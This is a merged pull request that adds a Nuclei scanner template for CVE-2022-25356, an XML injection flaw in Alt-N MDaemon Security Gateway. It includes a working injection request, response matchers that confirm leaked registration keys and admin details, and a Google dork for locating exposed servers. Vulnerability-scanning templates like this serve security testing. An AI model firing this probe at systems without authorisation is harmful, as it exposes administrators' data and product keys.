Merge pull request #5593 from projectdiscovery/CVE-2022-25356

Create CVE-2022-25356.yaml

cves/2022/CVE-2022-25356.yaml

@@ -0,0 +1,36 @@
+id: CVE-2022-25356
+
+info:
+  name: Alt-N MDaemon Security Gateway - XML Injection
+  author: Akincibor
+  severity: medium
+  description: |
+    In Alt-n Security Gateway product, a malicious actor could inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. In this way the XML parser fails the validation process disclosing information such as kind of protection used (2FA), admin email and product registration keys.
+  reference:
+    - https://www.swascan.com/security-advisory-alt-n-security-gateway/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-25356
+  classification:
+    cve-id: CVE-2022-25356
+  metadata:
+    verified: true
+    google-dork: inurl:"/SecurityGateway.dll"
+  tags: cve,cve2022,altn,gateway,xml,injection
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Exception: Error while [Loading XML"
+          - "<RegKey>"
+          - "<IsAdmin>"
+        condition: and
+
+      - type: status
+        status:
+          - 200